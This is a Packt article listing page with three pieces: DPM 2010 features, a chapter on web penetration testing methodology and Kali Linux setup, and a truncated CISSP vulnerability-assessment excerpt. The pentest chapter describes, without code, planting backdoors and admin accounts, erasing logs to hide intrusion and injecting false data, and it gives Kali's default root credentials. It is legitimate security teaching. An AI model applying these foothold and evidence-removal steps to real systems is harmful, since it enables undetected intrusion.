  Microsoft Data Protection Manager 2010 A practical step-by-step guide to planning deployment, installation, configuration, and troubleshooting of Data Protection Manager 2010 with this book and eBook         Read more about this book       (For more resources on this subject, see here.) DPM has a robust set of features and capabilities. The following are some of the most valuable ones: Disk-based data protection and recovery Continuous back up Tape-based archiving and back up Built in monitoring Cloud-based back up and recovery Built-in reports and notifications Integration with Microsoft System Center Operations Manager Windows PowerShell integration for scripting Remote administration Tight integration with other Microsoft products Protection of clustered servers Protection of application-specific servers Backing up the system state Backing up client computers New features of DPM 2010 Microsoft has done a great job of updating Data Protection Manager 2010 with great new features and some much needed features. There were some issues with Data Protection Manager 2007 that would cause an Administrator to perform routine maintenance on it. Most of these issues have been resolved with Data Protection Manager 2010. The following are the most exciting new features to DPM: DPM 2007 to DPM 2010 in-place upgrade Auto-Rerun and Auto-CC (Consistency Check) automatically fixes Replica Inconsistent errors Auto-Grow will automatically grow volumes as needed It allows you to shrink volumes as needed Bare metal restore A Back up SLA report that can be configured and e-mailed to you daily Self-restore service for SQL Database Administrators of SQL back ups When backing up SharePoint 2010, no recovery farm is required for item level recoveries for example: recover SharePoint list items, and recovery of items in SharePoint farm using host-headers. This is an improvement to SharePoint that DPM takes advantage of Better back up for mobile or disconnected employees (This requires VPN or Direct Access) End users of protected clients are able to recover their data. The end users can do this without an Administrator doing anything. DPM is Live Migration aware. We already know DPM can protect VMs on Hyper-V. Now DPM will automatically continue protection of a VM even after it has been migrated to a different Hyper-V server. The Hyper-V server has to be a Windows Server 2008 R2 clustered server. DPM2DPM4DR (DPM to DPM for Disaster Recovery) allows you to back up your DPM to a second DPM. This feature was available in 2007 and it can now be set up via the GUI. You can also perform chained DPM back up so you could have DPM A, DPM B, and DPM C. Before you could only have a secondary DPM server backing up a primary DPM server. With the 2010 release, a single DPM server's scalability has been increased over its previous 2007 release: DPM can handle 80 TB per server DPM can back up up to 100 servers DPM can back up up to 1000 clients DPM can back up up to 2000 SQL databases As you can see from the previous list there are many enhancements to DPM 2010 that will benefit Administrators as well as end users. Summary In this article we took a look at the existing as well as new features of DPM. Further resources on this subject: Installing Data Protection Manager 2010 [article] Overview of Data Protection Manager 2010 [article] Debatching Bulk Data on Microsoft Platform [article]
Read more
  • 0
  • 0
  • 7696

article-image-penetration-testing-and-setup
Packt
27 Sep 2013
35 min read
Save for later

Penetration Testing and Setup

Packt
27 Sep 2013
35 min read
(For more resources related to this topic, see here.) Penetration Testing goes beyond an assessment by evaluating identified vulnerabilities to verify if the vulnerability is real or a false positive. For example, an audit or an assessment may utilize scanning tools that provide a few hundred possible vulnerabilities on multiple systems. A Penetration Test would attempt to attack those vulnerabilities in the same manner as a malicious hacker to verify which vulnerabilities are genuine reducing the real list of system vulnerabilities to a handful of security weaknesses. The most effective Penetration Tests are the ones that target a very specific system with a very specific goal. Quality over quantity is the true test of a successful Penetration Test. Enumerating a single system during a targeted attack reveals more about system security and response time to handle incidents than wide spectrum attack. By carefully choosing valuable targets, a Penetration Tester can determine the entire security infrastructure and associated risk for a valuable asset. This is a common misinterpretation and should be clearly explained to all potential customers. Penetration Testing evaluates the effectiveness of existing security. If a customer does not have strong security then they will receive little value from Penetration Testing services. As a consultant, it is recommended that Penetration Testing services are offered as a means to verify security for existing systems once a customer believes they have exhausted all efforts to secure those systems and are ready to evaluate if there are any existing gaps in securing those systems. Positioning a proper scope of work is critical when selling Penetration Testing services. The scope of work defines what systems and applications are being targeted as well as what toolsets may be used to compromise vulnerabilities that are found. Best practice is working with your customer during a design session to develop an acceptable scope of work that doesn't impact the value of the results. Web Penetration Testing with Kali Linux—the next generation of BackTrack —is a hands-on guide that will provide you step-by-step methods for finding vulnerabilities and exploiting web applications. This article will cover researching targets, identifying and exploiting vulnerabilities in web applications as well as clients using web application services, defending web applications against common attacks, and building Penetration Testing deliverables for professional services practice. We believe this article is great for anyone who is interested in learning how to become a Penetration Tester, users who are new to Kali Linux and want to learn the features and differences in Kali versus BackTrack, and seasoned Penetration Testers who may need a refresher or reference on new tools and techniques. This article will break down the fundamental concepts behind various security services as well as guidelines for building a professional Penetration Testing practice. Concepts include differentiating a Penetration Test from other services, methodology overview, and targeting web applications. This article also provides a brief overview of setting up a Kali Linux testing or real environment. Web application Penetration Testing concepts A web application is any application that uses a web browser as a client. This can be a simple message board or a very complex spreadsheet. Web applications are popular based on ease of access to services and centralized management of a system used by multiple parties. Requirements for accessing a web application can follow industry web browser client standards simplifying expectations from both the service providers as well as the hosts accessing the application. Web applications are the most widely used type of applications within any organization. They are the standard for most Internet-based applications. If you look at smartphones and tablets, you will find that most applications on these devices are also web applications. This has created a new and large target-rich surface for security professionals as well as attackers exploiting those systems. Penetration Testing web applications can vary in scope since there is a vast number of system types and business use cases for web application services. The core web application tiers which are hosting servers, accessing devices, and data depository should be tested along with communication between the tiers during a web application Penetration Testing exercise. An example for developing a scope for a web application Penetration Test is testing a Linux server hosting applications for mobile devices. The scope of work at a minimum should include evaluating the Linux server (operating system, network configuration, and so on), applications hosted from the server, how systems and users authenticate, client devices accessing the server and communication between all three tiers. Additional areas of evaluation that could be included in the scope of work are how devices are obtained by employees, how devices are used outside of accessing the application, the surrounding network(s), maintenance of the systems, and the users of the systems. Some examples of why these other areas of scope matter are having the Linux server compromised by permitting connection from a mobile device infected by other means or obtaining an authorized mobile device through social media to capture confidential information. Some deliverable examples in this article offer checkbox surveys that can assist with walking a customer through possible targets for a web application Penetration Testing scope of work. Every scope of work should be customized around your customer's business objectives, expected timeframe of performance, allocated funds, and desired outcome. As stated before, templates serve as tools to enhance a design session for developing a scope of work. Penetration Testing methodology There are logical steps recommended for performing a Penetration Test. The first step is identifying the project's starting status. The most common terminology defining the starting state is Black box testing, White box testing, or a blend between White and Black box testing known as Gray box testing. Black box assumes the Penetration Tester has no prior knowledge of the target network, company processes, or services it provides. Starting a Black box project requires a lot of reconnaissance and, typically, is a longer engagement based on the concept that real-world attackers can spend long durations of time studying targets before launching attacks. As a security professional, we find Black box testing presents some problems when scoping a Penetration Test. Depending on the system and your familiarity with the environment, it can be difficult to estimate how long the reconnaissance phase will last. This usually presents a billing problem. Customers, in most cases, are not willing to write a blank cheque for you to spend unlimited time and resources on the reconnaissance phase; however, if you do not spend the time needed then your Penetration Test is over before it began. It is also unrealistic because a motivated attacker will not necessarily have the same scoping and billing restrictions as a professional Penetration Tester. That is why we recommend Gray box over Black box testing. White box is when a Penetration Tester has intimate knowledge about the system. The goals of the Penetration Test are clearly defined and the outcome of the report from the test is usually expected. The tester has been provided with details on the target such as network information, type of systems, company processes, and services. White box testing typically is focused on a particular business objective such as meeting a compliance need, rather than generic assessment, and could be a shorter engagement depending on how the target space is limited. White box assignments could reduce information gathering efforts, such as reconnaissance services, equaling less cost for Penetration Testing services. Gray box testing falls in between Black and White box testing. It is when the client or system owner agrees that some unknown information will eventually be discovered during a Reconnaissance phase, but allows the Penetration Tester to skip this part. The Penetration Tester is provided some basic details of the target; however, internal workings and some other privileged information is still kept from the Penetration Tester. Real attackers tend to have some information about a target prior to engaging the target. Most attackers (with the exception of script kiddies or individuals downloading tools and running them) do not choose random targets. They are motivated and have usually interacted in some way with their target before attempting an attack. Gray box is an attractive choice approach for many security professionals conducting Penetration Tests because it mimics real-world approaches used by attackers and focuses on vulnerabilities rather than reconnaissance. The scope of work defines how penetration services will be started and executed. Kicking off a Penetration Testing service engagement should include an information gathering session used to document the target environment and define the boundaries of the assignment to avoid unnecessary reconnaissance services or attacking systems that are out of scope. A well-defined scope of work will save a service provider from scope creep (defined as uncontrolled changes or continuous growth in a project's scope), operate within the expected timeframe and help provide more accurate deliverable upon concluding services. Real attackers do not have boundaries such as time, funding, ethics, or tools meaning that limiting a Penetration Testing scope may not represent a real-world scenario. In contrast to a limited scope, having an unlimited scope may never evaluate critical vulnerabilities if a Penetration Test is concluded prior to attacking desired systems. For example, a Penetration Tester may capture user credentials to critical systems and conclude with accessing those systems without testing how vulnerable those systems are to network-based attacks. It's also important to include who is aware of the Penetration Test as a part of the scope. Real attackers may strike at anytime and probably when people are least expecting it. Some fundamentals for developing a scope of work for a Penetration Test are as follows: Definition of Target System(s): This specifies what systems should be tested. This includes the location on the network, types of systems, and business use of those systems. Timeframe of Work Performed: When the testing should start and what is the timeframe provided to meet specified goals. Best practice is NOT to limit the time scope to business hours. How Targets Are Evaluated: What types of testing methods such as scanning or exploitation are and not permitted? What is the risk associated with permitted specific testing methods? What is the impact of targets that become inoperable due to penetration attempts? Examples are; using social networking by pretending to be an employee, denial of service attack on key systems, or executing scripts on vulnerable servers. Some attack methods may pose a higher risk of damaging systems than others. Tools and software: What tools and software are used during the Penetration Test? This is important and a little controversial. Many security professionals believe if they disclose their tools they will be giving away their secret sauce. We believe this is only the case when security professionals used widely available commercial products and are simply rebranding canned reports from these products. Seasoned security professionals will disclose the tools being used, and in some cases when vulnerabilities are exploited, documentation on the commands used within the tools to exploit a vulnerability. This makes the exploit re-creatable, and allows the client to truly understand how the system was compromised and the difficulty associated with the exploit. Notified Parties: Who is aware of the Penetration Test? Are they briefed beforehand and able to prepare? Is reaction to penetration efforts part of the scope being tested? If so, it may make sense not to inform the security operations team prior to the Penetration Test. This is very important when looking at web applications that may be hosted by another party such as a cloud service provider that could be impacted from your services. Initial Access Level: What type of information and access is provided prior to kicking off the Penetration Test? Does the Penetration Tester have access to the server via Internet and/or Intranet? What type of initial account level access is granted? Is this a Black, White, or Gray box assignment for each target? Definition of Target Space: This defines the specific business functions included in the Penetration Test. For example, conducting a Penetration Test on a specific web application used by sales while not touching a different application hosted from the same server. Identification of Critical Operation Areas: Define systems that should not be touched to avoid a negative impact from the Penetration Testing services. Is the active authentication server off limits? It's important to make critical assets clear prior to engaging a target. Definition of the Flag: It is important to define how far a Penetration Test should compromise a system or a process. Should data be removed from the network or should the attacker just obtain a specific level of unauthorized access? Deliverable: What type of final report is expected? What goals does the client specify to be accomplished upon closing a Penetration Testing service agreement? Make sure the goals are not open-ended to avoid scope creep of expected service. Is any of the data classified or designated for a specific group of people? How should the final report be delivered? It is important to deliver a sample report or periodic updates so that there are no surprises in the final report. Remediation expectations: Are vulnerabilities expected to be documented with possible remediation action items? Who should be notified if a system is rendered unusable during a Penetration Testing exercise? What happens if sensitive data is discovered? Most Penetration Testing services do NOT include remediation of problems found. Some service definitions that should be used to define the scope of services are: Security Audit: Evaluating a system or an application's risk level against a set of standards or baselines. Standards are mandatory rules while baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies, and processes. Most requests for security serves for audits are focused on passing an official audit (for example preparing for a corporate or a government audit) or proving the baseline requirements are met for a mandatory set of regulations (for example following the HIPAA and HITECH mandates for protecting healthcare records). It is important to inform potential customers if your audit services include any level of insurance or protection if an audit isn't successful after your services. It's also critical to document the type of remediation included with audit services (that is, whether you would identify a problem, offer a remediation action plan or fix the problem). Auditing for compliance is much more than running a security tool. It relies heavily on the standard types of reporting and following a methodology that is an accepted standard for the audit. In many cases, security audits give customers a false sense of security depending on what standards or baselines are being audited. Most standards and baselines have a long update process that is unable to keep up with the rapid changes in threats found in today's cyber world. It is HIGHLY recommended to offer security services beyond standards and baselines to raise the level of security to an acceptable level of protection for real-world threats. Services should include following up with customers to assist with remediation along with raising the bar for security beyond any industry standards and baselines. Vulnerability Assessment: This is the process in which network devices, operating systems and application software are scanned in order to identify the presence of known and unknown vulnerabilities. Vulnerability is a gap, error, or weakness in how a system is designed, used, and protected. When a vulnerability is exploited, it can result in giving unauthorized access, escalation of privileges, denial-of-service to the asset, or other outcomes. Vulnerability Assessments typically stop once a vulnerability is found, meaning that the Penetration Tester doesn't execute an attack against the vulnerability to verify if it's genuine. A Vulnerability Assessment deliverable provides potential risk associated with all the vulnerabilities found with possible remediation steps. There are many solutions such as Kali Linux that can be used to scan for vulnerabilities based on system/server type, operating system, ports open for communication and other means. Vulnerability Assessments can be White, Gray, or Black box depending on the nature of the assignment. Vulnerability scans are only useful if they calculate risk. The downside of many security audits is vulnerability scan results that make security audits thicker without providing any real value. Many vulnerability scanners have false positives or identify vulnerabilities that are not really there. They do this because they incorrectly identify the OS or are looking for specific patches to fix vulnerabilities but not looking at rollup patches (patches that contain multiple smaller patches) or software revisions. Assigning risk to vulnerabilities gives a true definition and sense of how vulnerable a system is. In many cases, this means that vulnerability reports by automated tools will need to be checked. Customers will want to know the risk associated with vulnerability and expected cost to reduce any risk found. To provide the value of cost, it's important to understand how to calculate risk. Calculating risk It is important to understand how to calculate risk associated with vulnerabilities found, so that a decision can be made on how to react. Most customers look to the CISSP triangle of CIA when determining the impact of risk. CIA is the confidentiality, integrity, and availability of a particular system or application. When determining the impact of risk, customers must look at each component individually as well as the vulnerability in its entirety to gain a true perspective of the risk and determine the likelihood of impact. It is up to the customer to decide if the risk associated to vulnerability found justifies or outweighs the cost of controls required to reduce the risk to an acceptable level. A customer may not be able to spend a million dollars on remediating a threat that compromises guest printers; however, they will be very willing to spend twice as much on protecting systems with the company's confidential data. The Certified Information Systems Security Professional (CISSP) curriculum lists formulas for calculating risk as follow. A Single Loss Expectancy (SLE) is the cost of a single loss to an Asset Value (AV). Exposure Factor (EF) is the impact the loss of the asset will have to an organization such as loss of revenue due to an Internet-facing server shutting down. Customers should calculate the SLE of an asset when evaluating security investments to help identify the level of funding that should be assigned for controls. If a SLE would cause a million dollars of damage to the company, it would make sense to consider that in the budget. The Single Loss Expectancy formula: SLE = AV * EF The next important formula is identifying how often the SLE could occur. If an SLE worth a million dollars could happen once in a million years, such as a meteor falling out of the sky, it may not be worth investing millions in a protection dome around your headquarters. In contrast, if a fire could cause a million dollars worth of damage and is expected every couple of years, it would be wise to invest in a fire prevention system. The number of times an asset is lost is called the Annual Rate of Occurrence (ARO). The Annualized Loss Expectancy (ALE) is an expression of annual anticipated loss due to risk. For example, a meteor falling has a very low annualized expectancy (once in a million years), while a fire is a lot more likely and should be calculated in future investments for protecting a building. Annualized Loss Expectancy formula: ALE = SLE * ARO The final and important question to answer is the risk associated with an asset used to figure out the investment for controls. This can determine if and how much the customer should invest into remediating vulnerability found in a asset. Risk formula: Risk = Asset Value * Threat * Vulnerability * Impact It is common for customers not to have values for variables in Risk Management formulas. These formulas serve as guidance systems, to help the customer better understand how they should invest in security. In my previous examples, using the formulas with estimated values for a meteor shower and fire in a building, should help explain with estimated dollar value why a fire prevention system is a better investment than metal dome protecting from falling objects. Penetration Testing is the method of attacking system vulnerabilities in a similar way to real malicious attackers. Typically, Penetration Testing services are requested when a system or network has exhausted investments in security and clients are seeking to verify if all avenues of security have been covered. Penetration Testing can be Black, White, or Gray box depending on the scope of work agreed upon. The key difference between a Penetration Test and Vulnerability Assessment is that a Penetration Test will act upon vulnerabilities found and verify if they are real reducing the list of confirmed risk associated with a target. A Vulnerability Assessment of a target could change to a Penetration Test once the asset owner has authorized the service provider to execute attacks against the vulnerabilities identified in a target. Typically, Penetration Testing services have a higher cost associated since the services require more expensive resources, tools, and time to successfully complete assignments. One popular misconception is that a Penetration Testing service enhances IT security since services have a higher cost associated than other security services: Penetration Testing does not make IT networks more secure, since services evaluate existing security! A customer should not consider a Penetration Test if there is a belief the target is not completely secure. Penetration Testing can cause a negative impact to systems: It's critical to have authorization in writing from the proper authorities before starting a Penetration Test of an asset owned by another party. Not having proper authorization could be seen as illegal hacking by authorities. Authorization should include who is liable for any damages caused during a penetration exercise as well as who should be contacted to avoid future negative impacts once a system is damaged. Best practice is alerting the customers of all the potential risks associated with each method used to compromise a target prior to executing the attack to level set expectations. This is also one of the reasons we recommend targeted Penetration Testing with a small scope. It is easier to be much more methodical in your approach. As a common best practice, we receive confirmation, which is a worst case scenario, that a system can be restored by a customer using backups or some other disaster recovery method. Penetration Testing deliverable expectations should be well defined while agreeing on a scope of work. The most common methods by which hackers obtain information about targets is through social engineering via attacking people rather than systems. Examples are interviewing for a position within the organization and walking out a week later with sensitive data offered without resistance. This type of deliverable may not be acceptable if a customer is interested in knowing how vulnerable their web applications are to remote attack. It is also important to have a defined end-goal so that all parties understand when the penetration services are considered concluded. Usually, an agreed-upon deliverable serves this purpose. A Penetration Testing engagement's success for a service provider is based on profitability of time and services used to deliver the Penetration Testing engagement. A more efficient and accurate process means better results for less services used. The higher the quality of the deliverables, the closer the service can meet customer expectation, resulting in a better reputation and more future business. For these reasons, it's important to develop a methodology for executing Penetration Testing services as well as for how to report what is found. Kali Penetration Testing concepts Kali Linux is designed to follow the flow of a Penetration Testing service engagement. Regardless if the starting point is White, Black, or Gray box testing, there is a set of steps that should be followed when Penetration Testing a target with Kali or other tools. Step 1 – Reconnaissance You should learn as much as possible about a target's environment and system traits prior to launching an attack. The more information you can identify about a target, the better chance you have to identify the easiest and fastest path to success. Black box testing requires more reconnaissance than White box testing since data is not provided about the target(s). Reconnaissance services can include researching a target's Internet footprint, monitoring resources, people, and processes, scanning for network information such as IP addresses and systems types, social engineering public services such as help desk and other means. Reconnaissance is the first step of a Penetration Testing service engagement regardless if you are verifying known information or seeking new intelligence on a target. Reconnaissance begins by defining the target environment based on the scope of work. Once the target is identified, research is performed to gather intelligence on the target such as what ports are used for communication, where it is hosted, the type of services being offered to clients, and so on. This data will develop a plan of action regarding the easiest methods to obtain desired results. The deliverable of a reconnaissance assignment should include a list of all the assets being targeted, what applications are associated with the assets, services used, and possible asset owners. Kali Linux offers a category labeled Information Gathering that serves as a Reconnaissance resource. Tools include methods to research network, data center, wireless, and host systems. The following is the list of Reconnaissance goals: Identify target(s) Define applications and business use Identify system types Identify available ports Identify running services Passively social engineer information Document findings Step 2 – Target evaluation Once a target is identified and researched from Reconnaissance efforts, the next step is evaluating the target for vulnerabilities. At this point, the Penetration Tester should know enough about a target to select how to analyze for possible vulnerabilities or weakness. Examples for testing for weakness in how the web application operates, identified services, communication ports, or other means. Vulnerability Assessments and Security Audits typically conclude after this phase of the target evaluation process. Capturing detailed information through Reconnaissance improves accuracy of targeting possible vulnerabilities, shortens execution time to perform target evaluation services, and helps to avoid existing security. For example, running a generic vulnerability scanner against a web application server would probably alert the asset owner, take a while to execute and only generate generic details about the system and applications. Scanning a server for a specific vulnerability based on data obtained from Reconnaissance would be harder for the asset owner to detect, provide a good possible vulnerability to exploit, and take seconds to execute. Evaluating targets for vulnerabilities could be manual or automated through tools. There is a range of tools offered in Kali Linux grouped as a category labeled Vulnerability Analysis. Tools range from assessing network devices to databases. The following is the list of Target Evaluation goals: Evaluation targets for weakness Identify and prioritize vulnerable systems Map vulnerable systems to asset owners Document findings Step 3 – Exploitation This step exploits vulnerabilities found to verify if the vulnerabilities are real and what possible information or access can be obtained. Exploitation separates Penetration Testing services from passive services such as Vulnerability Assessments and Audits. Exploitation and all the following steps have legal ramifications without authorization from the asset owners of the target. The success of this step is heavily dependent on previous efforts. Most exploits are developed for specific vulnerabilities and can cause undesired consequences if executed incorrectly. Best practice is identifying a handful of vulnerabilities and developing an attack strategy based on leading with the most vulnerable first. Exploiting targets can be manual or automated depending on the end objective. Some examples are running SQL Injections to gain admin access to a web application or social engineering a Helpdesk person into providing admin login credentials. Kali Linux offers a dedicated catalog of tools titled Exploitation Tools for exploiting targets that range from exploiting specific services to social engineering packages. The following is the list of Exploitation goals: Exploit vulnerabilities Obtain foothold Capture unauthorized data Aggressively social engineer Attack other systems or applications Document findings Step 4 – Privilege Escalation Having access to a target does not guarantee accomplishing the goal of a penetration assignment. In many cases, exploiting a vulnerable system may only give limited access to a target's data and resources. The attacker must escalate privileges granted to gain the access required to capture the flag, which could be sensitive data, critical infrastructure, and so on. Privilege Escalation can include identifying and cracking passwords, user accounts, and unauthorized IT space. An example is achieving limited user access, identifying a shadow file containing administration login credentials, obtaining an administrator password through password cracking, and accessing internal application systems with administrator access rights. Kali Linux includes a number of tools that can help gain Privilege Escalation through the Password Attacks and Exploitation Tools catalog. Since most of these tools include methods to obtain initial access and Privilege Escalation, they are gathered and grouped according to their toolsets. The following is a list of Privilege Escalation goals: Obtain escalated level access to system(s) and network(s) Uncover other user account information Access other systems with escalated privileges Document findings Step 5 – maintaining a foothold The final step is maintaining access by establishing other entry points into the target and, if possible, covering evidence of the penetration. It is possible that penetration efforts will trigger defenses that will eventually secure how the Penetration Tester obtained access to the network. Best practice is establishing other means to access the target as insurance against the primary path being closed. Alternative access methods could be backdoors, new administration accounts, encrypted tunnels, and new network access channels. The other important aspect of maintaining a foothold in a target is removing evidence of the penetration. This will make it harder to detect the attack thus reducing the reaction by security defenses. Removing evidence includes erasing user logs, masking existing access channels, and removing the traces of tampering such as error messages caused by penetration efforts. Kali Linux includes a catalog titled Maintaining Access focused on keeping a foothold within a target. Tools are used for establishing various forms of backdoors into a target. The following is a list of goals for maintaining a foothold: Establish multiple access methods to target network Remove evidence of authorized access Repair systems impacting by exploitation Inject false data if needed Hide communication methods through encryption and other means Document findings Introducing Kali Linux The creators of BackTrack have released a new, advanced Penetration Testing Linux distribution named Kali Linux. BackTrack 5 was the last major version of the BackTrack distribution. The creators of BackTrack decided that to move forward with the challenges of cyber security and modern testing a new foundation was needed. Kali Linux was born and released on March 13th, 2013. Kali Linux is based on Debian and an FHS-compliant filesystem. Kali has many advantages over BackTrack. It comes with many more updated tools. The tools are streamlined with the Debian repositories and synchronized four times a day. That means users have the latest package updates and security fixes. The new compliant filesystems translate into running most tools from anywhere on the system. Kali has also made customization, unattended installation, and flexible desktop environments strong features in Kali Linux. Kali Linux is available for download at http://www.kali.org/. Kali system setup Kali Linux can be downloaded in a few different ways. One of the most popular ways to get Kali Linux is to download the ISO image. The ISO image is available in 32-bit and 64-bit images. If you plan on using Kali Linux on a virtual machine such as VMware, there is a VM image prebuilt. The advantage of downloading the VM image is that it comes preloaded with VMware tools. The VM image is a 32-bit image with Physical Address Extension support, or better known as PAE. In theory, a PAE kernel allows the system to access more system memory than a traditional 32-bit operating system. There have been some well-known personalities in the world of operating systems that have argued for and against the usefulness of a PAE kernel. However, the authors of this article suggest using the VM image of Kali Linux if you plan on using it in a virtual environment. Running Kali Linux from external media Kali Linux can be run without installing software on a host hard drive by accessing it from an external media source such as a USB drive or DVD. This method is simple to enable; however, it has performance and operational implementations. Kali Linux having to load programs from a remote source would impact performance and some applications or hardware settings may not operate properly. Using read-only storage media does not permit saving custom settings that may be required to make Kali Linux operate correctly. It's highly recommended to install Kali Linux on a host hard drive. Installing Kali Linux Installing Kali Linux on your computer is straightforward and similar to installing other operating systems. First, you'll need compatible computer hardware. Kali is supported on i386, amd64, and ARM (both armel and armhf) platforms. The hardware requirements are shown in the following list, although we suggest exceeding the minimum amount by at least three times. Kali Linux, in general, will perform better if it has access to more RAM and is installed on newer machines. Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or a USB port on your computer, check out the Kali Linux Network Install. The following is a list of minimum installation requirements: A minimum of 8 GB disk space for installing Kali Linux. For i386 and amd64 architectures, a minimum of 512MB RAM. CD-DVD Drive / USB boot support. You will also need an active Internet connection before installation. This is very important or you will not be able to configure and access repositories during installation. When you start Kali you will be presented with a Boot Install screen. You may choose what type of installation (GUI-based or text-based) you would like to perform. Select the local language preference, country, and keyboard preferences. Select a hostname for the Kali Linux host. The default hostname is Kali. Select a password. Simple passwords may not work so chose something that has some degree of complexity. The next prompt asks for your timezone. Modify accordingly and select Continue. The next screenshot shows selecting Eastern standard time. The installer will ask to set up your partitions. If you are installing Kali on a virtual image, select Guided Install – Whole Disk. This will destroy all data on the disk and install Kali Linux. Keep in mind that on a virtual machine, only the virtual disk is getting destroyed. Advanced users can select manual configurations to customize partitions. Kali also offers the option of using LVM, logical volume manager. LVM allows you to manage and resize partitions after installation. In theory, it is supposed to allow flexibility when storage needs change from initial installation. However, unless your Kali Linux needs are extremely complex, you most likely will not need to use it. The last window displays a review of the installation settings. If everything looks correct, select Yes to continue the process as shown in the following screenshot: Kali Linux uses central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via HTTP protocol. If your network uses a proxy server, you will also need to configure the proxy settings for you network. Kali will prompt to install GRUB. GRUB is a multi-bootloader that gives the user the ability to pick and boot up to multiple operating systems. In almost all cases, you should select to install GRUB. If you are configuring your system to dual boot, you will want to make sure GRUB recognizes the other operating systems in order for it to give users the options to boot into an alternative operating system. If it does not detect any other operating systems, the machine will automatically boot into Kali Linux. Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select Continue to reboot your system. Kali Linux and VM image first run On some Kali installation methods, you will be asked to set the root's password. When Kali Linux boots up, enter the root's username and the password you selected. If you downloaded a VM image of Kali, you will need the root password. The default username is root and password is toor. Kali toolset overview Kali Linux offers a number of customized tools designed for Penetration Testing. Tools are categorized in the following groups as seen in the drop-down menu shown in the following screenshot: Information Gathering: These are Reconnaissance tools used to gather data on your target network and devices. Tools range from identifying devices to protocols used. Vulnerability Analysis: Tools from this section focus on evaluating systems for vulnerabilities. Typically, these are run against systems found using the Information Gathering Reconnaissance tools. Web Applications: These are tools used to audit and exploit vulnerabilities in web servers. Many of the audit tools we will refer to in this article come directly from this category. However web applications do not always refer to attacks against web servers, they can simply be web-based tools for networking services. For example, web proxies will be found under this section. Password Attacks: This section of tools primarily deals with brute force or the offline computation of passwords or shared keys used for authentication. Wireless Attacks: These are tools used to exploit vulnerabilities found in wireless protocols. 802.11 tools will be found here, including tools such as aircrack, airmon, and wireless password cracking tools. In addition, this section has tools related to RFID and Bluetooth vulnerabilities as well. In many cases, the tools in this section will need to be used with a wireless adapter that can be configured by Kali to be put in promiscuous mode. Exploitation Tools: These are tools used to exploit vulnerabilities found in systems. Usually, a vulnerability is identified during a Vulnerability Assessment of a target. Sniffing and Spoofing: These are tools used for network packet captures, network packet manipulators, packet crafting applications, and web spoofing. There are also a few VoIP reconstruction applications. Maintaining Access: Maintaining Access tools are used once a foothold is established into a target system or network. It is common to find compromised systems having multiple hooks back to the attacker to provide alternative routes in the event a vulnerability that is used by the attacker is found and remediated. Reverse Engineering: These tools are used to disable an executable and debug programs. The purpose of reverse engineering is analyzing how a program was developed so it can be copied, modified, or lead to development of other programs. Reverse Engineering is also used for malware analysis to determine what an executable does or by researchers to attempt to find vulnerabilities in software applications. Stress Testing: Stress Testing tools are used to evaluate how much data a system can handle. Undesired outcomes could be obtained from overloading systems such as causing a device controlling network communication to open all communication channels or a system shutting down (also known as a denial of service attack). Hardware Hacking: This section contains Android tools, which could be classified as mobile, and Ardunio tools that are used for programming and controlling other small electronic devices. Forensics: Forensics tools are used to monitor and analyze computer network traffic and applications. Reporting Tools: Reporting tools are methods to deliver information found during a penetration exercise. System Services: This is where you can enable and disable Kali services. Services are grouped into BeEF, Dradis, HTTP, Metasploit, MySQL, and SSH. Summary This article served as an introduction to Penetration Testing Web Applications and an overview of setting up Kali Linux. We started off defining best practices for performing Penetration Testing services including defining risk and differences between various services. The key takeaway is to understand what makes a Penetration Test different from other security services, how to properly scope a level of service and best method to perform services. Positioning the right expectations upfront with a potential client will better qualify the opportunity and simplify developing an acceptable scope of work. This article continued with providing an overview of Kali Linux. Topics included how to download your desired version of Kali Linux, ways to perform the installation, and brief overview of toolsets available. The next article will cover how to perform Reconnaissance on a target. This is the first and most critical step in delivering Penetration Testing services. Resources for Article: Further resources on this subject: BackTrack 4: Security with Penetration Testing Methodology [Article] CISSP: Vulnerability and Penetration Testing for Access Control [Article] Making a Complete yet Small Linux Distribution [Article]
Read more
  • 0
  • 0
  • 7422
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-cissp-vulnerability-and-penetration-testing-access-control
Packt
12 Mar 2010
6 min read
Save for later

CISSP: Vulnerability and Penetration Testing for Access Control

Packt
12 Mar 2010
6 min read
IT components such as operating systems, application software, and even networks, have many vulnerabilities. These vulnerabilities are open to compromise or exploitation. This creates the possibility for penetration into the systems that may result in unauthorized access and a compromise of confidentiality, integrity, and availability of information assets. Vulnerability tests are performed to identify vulnerabilities while penetration tests are conducted to check the following: The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained The systems can be shut down or overloaded with malicious data using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied Vulnerability assessment and penetration testing processes are like IT audits. Therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation. Vulnerability assessment Vulnerability assessment is a process in which the IT systems such as computers and networks, and software such as operating systems and application software are scanned in order to indentify the presence of known and unknown vulnerabilities. Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both. For example, buffer overflow is a vulnerability where the boundary limits for an entity such as variables and constants are not properly defined or checked. This can be compromised by supplying data which is greater than what the entity can hold. This results in a memory spill over into other areas and thereby corrupts the instructions or code that need to be processed by the microprocessor. When a vulnerability is exploited it results in a security violation, which will result in a certain impact. A security violation may be an unauthorized access, escalation of privileges, or denial-of-service to the IT systems. Tools are used in the process of identifying vulnerabilities. These tools are called vulnerability scanners. A vulnerability scanning tool can be a hardware-based or software application. Generally, vulnerabilities can be classified based on the type of security error. A type is a root cause of the vulnerability. Vulnerabilities can be classified into the following types: Access Control Vulnerabilities It is an error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource. Examples: Improper or no access control list or table No privilege model Inadequate file permissions Improper or weak encoding Security violation and impact: Files, objects, or processes can be accessed directly without authenticationor routing. Authentication Vulnerabilities It is an error due to inadequate identification mechanisms so that a user or a process is not correctly identified. Examples: Weak or static passwords Improper or weak encoding, or weak algorithms Security violation and impact: An unauthorized, or less privileged user (for example, Guest user), or a less privileged process gains higher privileges, such as administrative or root access to the system Boundary Condition Vulnerabilities It is an error due to inadequate 